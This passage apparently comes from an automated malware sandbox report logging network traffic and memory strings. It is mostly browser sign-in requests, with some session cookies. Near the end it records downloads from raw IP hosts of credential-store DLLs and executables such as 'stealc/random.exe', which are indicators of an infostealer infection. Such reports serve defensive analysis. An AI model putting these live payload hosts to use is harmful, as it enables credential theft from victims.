"10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:yI_OEUMu7IGbnCDihcwlWJkLhxv6TQ:XPid9P2CWoLMw6di
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlEjXkpY1miL806lUCCtQlrHu-H96g/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74EGyOtYhtIedH616HDdleWeyvx-W5gVjR9WtunrFrzD7YvzKdhr32YF_YLRBX-ZKofQnLR HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:LYHKDd3zseErEFB9_nba7XBg1Is9-w:UN_hHMbC-ffQw73q
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76l5PHSkuJEfmntRfpXyKF9d2CZ3ZVNDVHTO0EGAn7_bo5ZGw98nP2MHND84A-DOFk_AEPt&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1609852158%3A1722009468052145&ddm=0 HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
Source: global traffic	HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB2MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHu1g2JNWjQ7Rsj1KTg1Ll6LPidEQ/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722614268&P2=404&P3=2&P4=aDBJmBRiu4bBgG0d5CtBgiCyasWY4s3e85vX9uilaJ5ZoJGUCP2ypk%2bTuDQrDjSoZ5e0N2ocgIZWMEShUpNIng%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: 1nTulnp8J4hLpQqiZr1rmMSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /_/bscframe HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
Source: global traffic	HTTP traffic detected: GET /generate_204?2GXXiw HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom
Source: global traffic	HTTP traffic detected: GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/1.1Host: location.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v3/signin/_/AccountsSignInUi/gen204/?tmambps=0.00006616961789375582&rtembps=-1&rttms=82&ct=undefined HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=516=eLtuQCG4EKOUiy_WkIWBEoarZIHSwG7qGlWLFpSQnVFe8D_MZ9msw9JLMJwj8x708HeKW6qgHSTPUcFjpzJ8ZYyqvyV3spkA26VZGF4EVJPCbE-E1tXgy8VtJWXjgpQJTmQfV6E2tDYD3sQA5CvGeAKYlXOoJRi2UpDnhZW-H8M
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/PharmaciesDetection.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /inc/buildred.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/build2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache

Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://connect.facebook.net//sdk.js""://.imgur.io/js/vendor..bundle.js""://auth.9c9media.ca/auth/main.js""https://smartblock.firefox.etp/play.svg""://static.adsafeprotected.com/iasPET.1.js""://adservex.media.net/videoAds.js""://.moatads.com//moatapi.js""://static.chartbeat.com/js/chartbeat.js""://connect.facebook.net//all.js""://.moatads.com//moatheader.js""://www.rva311.com/static/js/main..chunk.js""://cdn.optimizely.com/public/.js""://.vidible.tv//vidible-min.js""://www.google-analytics.com/gtm/js""://c.amazon-adsystem.com/aax2/apstag.js""://www.googletagservices.com/tag/js/gpt.js""://www.google-analytics.com/analytics.js""://imasdk.googleapis.com/js/sdkloader/ima3.js""://cdn.adsafeprotected.com/iasPET.1.js""://www.googletagmanager.com/gtm.js""://libs.coremetrics.com/eluminate.js""://js.maxmind.com/js/apis/geoip2//geoip2.js""://s.webtrends.com/js/advancedLinkTracking.js""://static.chartbeat.com/js/chartbeat_video.js""://.imgur.com/js/vendor..bundle.js""://s0.2mdn.net/instream/html5/ima3.js""://www.google-analytics.com/plugins/ua/ec.js""://www.everestjs.net/static/st.v3.js""://cdn.branch.io/branch-latest.min.js""://ssl.google-analytics.com/ga.js""://pub.doubleverify.com/signals/pub.js""://static.criteo.net/js/ld/publishertag.js""://.adsafeprotected.com/jload?""://s.webtrends.com/js/webtrends.js""://track.adform.net/Serving/TrackPoint/""://pubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.js""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com//Serving/""://pubads.g.doubleclick.net/gampad/ad-blk""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com/tpl?""://s.webtrends.com/js/webtrends.min.js""://pixel.advertising.com/firefox-etp""://pubads.g.doubleclick.net/gampad/ad-blk""://vast.adsafeprotected.com/vast""://securepubads.g.doubleclick.net/gampad/ad""://vast.adsafeprotected.com/vast""://www.facebook.com/platform/impression.php""://pubads.g.doubleclick.net/gampad/ad""://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.png""://ads.stickyadstv.com/auto-user-sync""://pixel.advertising.com/firefox-etp""://.adsafeprotected.com//imp/""://.adsafeprotected.com//unit/""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/.gif""://.adsafeprotected.com/jsvid""://.adsafeprotected.com/services/pub""://track.adform.net/Serving/TrackPoint/""://www.facebook.com/platform/impression.php""://.adsafeprotected.com/jload""://.adsafeprotected.com//adj""://.adsafeprotected.com//adj""://.adsafeprotected.com/.gif""://ads.stickyadstv.com/auto-user-sync""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com/.png""://.adsafeprotected.com//unit/""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com//Serving/""://.adsafeprotected.com/jload""://.adsafeprotected.com/jload?""://.adsafeprotected.com/.js""://.adsafeprotected.com/jsvid""*://
